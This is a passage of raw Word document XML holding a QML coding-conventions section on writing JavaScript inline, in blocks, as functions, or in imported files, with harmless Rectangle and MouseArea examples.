          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript Code</w:t>
      </w:r>
      <w:bookmarkEnd w:id="572"/>
      <w:bookmarkEnd w:id="573"/>
      <w:bookmarkEnd w:id="574"/>
      <w:bookmarkEnd w:id="575"/>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lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If the script is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>single expression</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, we recommend writing it </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>inline</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w: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type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>color</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"blue"</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width</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width</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w: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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>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lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If the script is only a </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>couple of lines long</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, we generally </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use a block</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w: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type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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color</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"blue"</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width</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: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var </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </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width</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w: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3</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console</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debug</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w</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w: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keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return</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w</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w:t>
      </w:r>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lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If the script is </w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>more than a couple of lines long or can be used by different objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, we </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>recommend creating a function</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and calling it like this:</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keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function</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calculateWidth</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object</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w: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var </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object</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width</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</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comment"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//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comment"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// more javascript code</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comment"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//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console</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debug</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w</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00D72F99"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D72F99">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00D72F99" w:rsidRDefault="00953F02" w:rsidP="00953F02">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00D72F99" w:rsidRDefault="00953F02" w:rsidP="00953F02">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A405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type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>color</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"blue"</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width</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calculateWidth</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 }</w:t>
      </w:r>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516C30">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For long scripts</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, we will </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>put the functions in their own JavaScript file</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and import it like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00953F02" w:rsidRDefault="00953F02" w:rsidP="00953F02">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:spacing w:before="180" w:after="37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import "myscript.js" as Script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00953F02" w:rsidRDefault="00953F02" w:rsidP="00953F02">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:spacing w:before="180" w:after="375"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Rectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>color</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="string"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"blue"</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width</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Script</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calculateWidth</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parent</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00953F02" w:rsidRDefault="00953F02" w:rsidP="00953F02">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If the code is longer than one line and hence within a block, we </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use semicolons</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to indicate the end of each statement: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Style w:val="type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MouseArea</w:t>
      </w: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anchors</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">.fill: </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>parent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onClicked</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: {</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var </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scenePos</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mapToItem</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>null</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mouseX</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mouseY</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w: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console</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
